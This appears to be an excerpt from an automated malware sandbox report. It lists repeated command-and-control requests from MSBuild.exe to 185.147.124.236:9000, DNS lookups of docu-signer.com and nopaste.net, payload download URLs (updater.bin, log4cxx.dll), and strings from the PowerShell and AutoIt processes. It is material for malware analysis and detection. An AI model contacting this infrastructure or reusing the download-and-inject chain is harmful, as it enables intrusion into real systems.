                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: powershell.exe, 00000002.00000002.2565317637.00000000082F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cnR equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: www.irs.gov
                    Source: global trafficDNS traffic detected: DNS query: nopaste.net
                    Source: global trafficDNS traffic detected: DNS query: docu-signer.com
                    Source: global trafficDNS traffic detected: DNS query: google.com
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.147.124.236
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.147.124.236:9000
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.147.124.236:9000/wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.147.124.236:9000/wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782P
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.147.124.236:9000t-
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                    Source: powershell.exe, 00000004.00000002.3855333456.0000000006C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft0
                    Source: powershell.exe, 00000004.00000002.3866570932.00000000098C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docu-signer.com
                    Source: powershell.exe, 00000002.00000002.2542129886.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3839692541.0000000004661000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: updater.exe, 0000000E.00000000.1701220815.0000000001089000.00000002.00000001.01000000.0000000D.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000000.1836457636.0000000000A69000.00000002.00000001.01000000.0000000F.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1973869878.0000000000A69000.00000002.00000001.01000000.0000000F.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
                    Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.drString found in binary or memory: http://x1.i.lencr.org/
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3839692541.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000004.00000002.3866570932.00000000098C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com
                    Source: powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dll
                    Source: powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bin
                    Source: powershell.exe, 00000004.00000002.3866570932.0000000009394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.comD
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
